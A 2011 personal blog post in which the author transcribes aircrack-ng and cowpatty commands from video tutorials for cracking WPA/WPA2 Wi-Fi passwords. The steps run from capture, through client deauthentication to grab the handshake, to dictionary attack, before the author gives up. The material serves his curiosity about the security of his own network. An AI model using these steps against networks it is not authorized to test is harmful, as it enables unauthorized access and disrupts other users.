Sunday, August 14, 2011

Wireless WPA/WPA2 hacking not worth the trouble





This is part 2 of my side journey into wireless hacking.   My previous post http://blog.workingsi.com/2011/08/playing-around-with-hacking-wep.html I replicated what I saw in a youtube video on hacking WiFi passwords from WEP.  It worked and proved to be so easy it made me fear for my WEP network.    However the majority of networks these days are WPA or WPA2 so I'm going to try to hack my WPA home network next.

I'm using the backtrack-linux aircrack-ng toolset again, as I did in my previous post.   See that post for how to put it on a USB stick and boot the computer into backtrack-linux.  Not to worry, following hacking posts can often lead you into some dark corners of the internet and this is not one of them.  These tools are open source, can be downloaded into ubuntu or used in backtrack.   Of course I could be fooled too, but I don't see anyway that this software could harm your computer or your files since it never leaves your USB stick.

Once again I'm starting with a video turtorial.  http://www.youtube.com/watch?v=T3iDWP2xeFw&feature=player_embedded#at=57 I don't know about you, but I'm no fan of video tutorials.  You have to use the sound, can only view  it on a real computer, have to start and stop it constantly because it goes to fast to type along, and you can't cut and paste anything.  Not sure why people like it so much.   I'm transcribing the commands here first.

  • airmon-ng
    • This command gives you back the system's name for your wireless adapter.  Usually wlan0 on all my systems
  • airodump-ng wlan0
    • scans for wireless networks and shows the BSSID, channel, security type
    • copy out the BSSID MAC address string of the WPA network you want to crack, record the channel.
  • airodump-ng -c [channel] -w [filename] --bssid [MAC address] wlan0
    •  narrows down and scans just the network that you picked
    • filename is the file you create to store the information.  Example uses "password"
    • Network is scanned, data packets go up, 
    • Station number is a person (client) on the network that is talking to the network.  You will need to copy out this string as well.
    • leave it running
  • Open a second terminal window
  • aireplay-ng -0 5 -c (Station Mac) -a (BSSID Mac) wlan0
    • -0 is the mode, 5 is the number of attempts, 
    • Macs are the numbers we got from the previous step
    • this apparently attempts to de-authenticate the targeted user from the network so they have to sign on again and resend their key.   I don't know if the user would even be aware this happened to them
    • Go back to the other window and look for WPA handshake
  • ctrl-c the airodump-ng window
  • dir
    • Look for the password file you created just now, it will be the most recent and is called password-06.cap in this example
  • aircrack-ng password-06.cap -w/pentest/wireless/aircrack-ng/test/password.lst
    • the password.lst is the password dictionary, they are on the internet and there is one included in the backtrack distro.  The one in the distro is pretty small.   http://www.outpost9.com/files/WordLists.html is recommended in the video
    • It begins actively scanning, it has 150,000 passwords

This is a bit less easy than WEP, because it needs a big password file, and if the password for the network isn't in the file, it will never crack it.
Also it looks like it doesn't work on WPA2.

Another video that seems to cover WPA2 PSK is here:
http://www.youtube.com/watch?v=wl4SZ6D9FY0&feature=related
It uses "coWPAtty" to crack the password, which is already kind of old.
  • airmon-ng
    • capture the essid, mac, client mac, channel, WPA2-PSK
  • airodump-ng --channel 8 --write output --bssid [mac] wlan0
    • dumps only the network you chose
  • aireplay-ng --deauth 1 -a [mac] -c [client mac] wlan0
    • again this deauthorizes a client in order to capture them logging back in and sending the password
  • aircrack-ng output-01.cap -w /root/tools/dictionaries/g0tmilk.lst
    • output-01.cap is the file you created during the second step
    • not sure where the password file came from that is magically entered
    • video finds the password in a second.  hmmmm
  • airolib-ng crackwpa --import passwd /root/tools/dictionaries/gotmilk.lst
    • no idea what this step does
    • seems to be just adding the new password to the library
  • airolib-ng crackwpa ---import essid [mac]
  • airolib-ng crackwpa --stats
  • airolib-ng crackwpa --clean all
  • airolib-ng crackwpa --batch
  • airolib-ng crackwpa --verify all
  • aircrack-ng -r crackwpa output-01.cap
  • cowpatty -s gotmilk -r /root/output-01.cap -f /root/tools/dictionaries/getmilk.lst
  • genpmk -f /root/tools/dictionaries/gotmilk.lst -d output -hash -s gotmilk
  • blah blah blah goes on for dozens more commands
    • sorry i grew bored of transcribing all the commands 
    • It looks like this is an exercise in brute force calculating the password against the hash.

I'm going to bail on this effort.  I don't really have a need to hack WPA or WPA2, and I read enough about it to know how it's done.  The interesting part was the de-authentication trick to capture the password being sent.  After that it is plain old password decryption.   If somebody wanted to take a long time and a concerted effort they could crack a nearby permanent network from their neighbor, school, etc.   If your evil goal was to get a little free WiFi as you travel around town, this would be useless.  Takes too long.  My motivation wanes.   My WPA2 password is so long and complicated, my network is safe.  :-)




No comments:

Post a Comment